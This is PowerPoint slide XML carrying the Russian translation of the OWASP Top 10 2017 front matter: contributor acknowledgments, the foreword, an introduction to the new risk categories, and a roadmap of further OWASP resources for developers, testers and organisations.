                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Эльнаггара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Osama</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Elnaggar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) за их огромный вклад. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Также, неоценимую помощь в создании новой категории </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> оказали Крис </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Фрохофф</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Chris</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Frohoff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) и Габриэль Лоуренс (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gabriel</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Lawrence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">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Aspect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AsTech</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Atos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Branding</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Brand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Bugcrowd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BUGemot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Checkmarx</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Colegio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LaSalle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Monteria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ContextIS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Contrast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Derek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Weeks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Easybss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Edgescan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Hamed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Hidden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I4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iBLISS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Seguran̤a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelig̻encia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ITsec</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Services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bv</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Khallagh</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Linden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M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dienstleistungen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Micro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Focus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Fortify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Minded</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National</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Center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Cyber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Technology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Network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Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Osampa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Paladion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Purpletalk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Secure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Shape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Softtek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Synopsis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Vantage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Point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Veracode</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392281257"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="953596"/>
          <a:ext cx="6858000" cy="8208914"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Предисловие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sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ненадежное программное обеспечение подрывает безопасность критических инфраструктур, относящихся, например, к здравоохранению, обороне, энергетике или финансам. Программное обеспечение становится сложнее, устройств, подключенных к сети, становится больше, поэтому важность обеспечения безопасности приложений  возрастает экспоненциально. Быстрое развитие методов разработки ПО приводит к необходимости быстро и безошибочно выявлять, а также устранять наиболее часто возникающие угрозы. Больше нельзя оставлять без должного внимания относительно простые угрозы безопасности, подобные представленным в данном списке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При создании Топ-10 OWASP - 2017 было получено огромное количество отзывов, намного больше чем по любым другим проектам OWASP. Это показывает, насколько сообщество заинтересовано в Топ-10 OWASP и насколько важно для OWASP сделать Топ-10 актуальным для большинства сценариев использования.</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Несмотря на то, что первоначальная цель проекта Топ-10 OWASP заключалась в простом привлечении внимания разработчиков и менеджеров к проблемам безопасности, проект де-факто стал стандартом безопасности приложений. </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этом выпуске проблемы и рекомендации по их устранению описаны кратко и в доступной форме для облегчения внедрения Топ-10 OWASP в программы обеспечения безопасности приложений. Крупным и высокопроизводительным организациям, которым требуется настоящий стандарт, мы рекомендуем использовать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Стандарт подтверждения безопасности приложений OWASP (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, но для большинства, при обеспечении безопасности приложений, будет достаточно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Мы также составили перечни рекомендуемых шагов для разных категорий пользователей Топ-10 OWASP, такие как </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Что делать разработчикам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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Что делать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>тестировщикам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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Что делать организациям</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (для директоров по информационным технологиям и директоров по информационной безопасности), а также </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Что делать менеджерам приложений</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (для менеджеров приложений или лиц, ответственных за жизненный цикл приложений).</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конечном счете, мы призываем все команды и организации, занимающиеся разработкой ПО, создать программу обеспечения безопасности приложений, которая будет соответствовать их культурному и технологическому уровню. Эти программы могут быть представлены в любой форме и объеме. Для оценки и улучшения существующей программы обеспечения безопасности приложений в вашей организации вы можете использовать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Модель обеспечения безопасности ПО (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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Надеемся, что Топ-10 OWASP окажется полезным при обеспечении безопасности ваших приложений. Все вопросы, комментарии и идеи вы можете оставлять в нашем проектном </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>репозитории</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> на </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</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Топ-10 OWASP и переводы можно найти здесь:</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Наконец, мы хотим поблагодарить основателей проекта Топ-10 OWASP, Дейва </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Вичерса</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Dave</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Wichers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Джеффа</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Вильямса (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jeff</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Williams</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), за их вклад и веру в успешное завершение данного документа стараниями сообщества. Большое вам спасибо!</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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Эндрю </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ван</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> дер Сток (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew</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van</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der</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Stock</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Брайан Глас (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>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t>Нейл </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1"/>
                        <a:t>Смитлайн</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Торстен</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Гиглер</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Torsten</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Gigler</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1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Поддержка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423244">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Благодарим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компанию </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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 за спонсорскую поддержку Топ-10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OWASP </a:t>
                      </a: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2017.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Организации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и отдельные лица, предоставившие данные по преобладающим уязвимостям или оказавшие иное содействие при создании списка, перечислены на странице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"Благодарности"</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П</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Предисловие</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580006215"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Представляем Топ-10 OWASP 2017!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="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sz="900" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Это крупное обновление включает в себя несколько новых категорий угроз, две из которых были выбраны сообществом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A8:2017-Небезопасная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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация</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и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A10:2017-Недостатки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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>журналирования</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 и мониторинга</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Два ключевых отличия подготовки данной версии Топ-10 OWASP заключаются в активной обратной связи сообщества и внушительном объеме данных, полученном от десятков организаций, возможно, самом большом из когда-либо собранных при подготовке стандарта по обеспечению безопасности приложений. Все это дает нам уверенность в том, что новая версия Топ-10 OWASP посвящена самым актуальным проблемам безопасности приложений, с которыми сталкиваются организации в настоящее время.</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Топ-10 OWASP 2017 основан главным образом на 40+ комплектах данных, полученных от организаций, которые специализируются на безопасности приложений, а также на отраслевых исследованиях, проведенных более 500 независимыми исследователями. Данные содержат информацию об уязвимостях, обнаруженных в сотнях организаций и более 100.000 реальных приложений и API. На основе данных о распространенности, простоте эксплуатации и сложности обнаружения уязвимостей, а также ущербе, который они могут нанести, составляется список Топ-10.</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Основной целью Топ-10 OWASP является ознакомление разработчиков, проектировщиков, архитекторов, менеджеров и организаций в целом с рисками, связанными с наиболее распространенными и существенными недостатками в безопасности веб-приложений. Топ-10 также предлагает базовые способы защиты от подобных рисков и руководства по дальнейшим действиям.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72736209"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="5134187"/>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56955">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1400" b="1" spc="-150" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Дорожная карта дальнейших действий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77467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Не останавливайтесь на 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Существуют сотни угроз, которые могут повлиять на безопасность веб-приложений. Этой теме посвящены </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Руководство разработчика OWASP</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7"/>
                        </a:rPr>
                        <a:t>Памятки OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Данные документы рекомендуются для прочтения всем разработчикам веб-приложений и API. Инструкции по эффективному обнаружению уязвимостей в веб-приложениях и API представлены в </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Руководстве OWASP по тестированию</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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Продолжайте совершенствоваться</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Топ-10 OWASP не стоит на месте и продолжит меняться. Даже без внесения каких-либо правок в код в приложениях могут появиться уязвимости, поскольку обнаруживаются новые векторы атак, а методы эксплуатации уязвимостей совершенствуются. Для получения дополнительной информации рекомендуем ознакомиться с советами, представленными в конце Топ-10 в разделах "Что делать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Разработчикам</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Тестировщикам</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Организациям</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12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Менеджерам приложений</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Мыслите позитивно</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" baseline="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rPr>
                        <a:t>Если вы хотите прекратить искать уязвимости и готовы перейти к созданию надежной системы обеспечения безопасности приложений, то в качестве отправной точки для разработчиков может послужить проект </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Реализации </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>проактивной</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
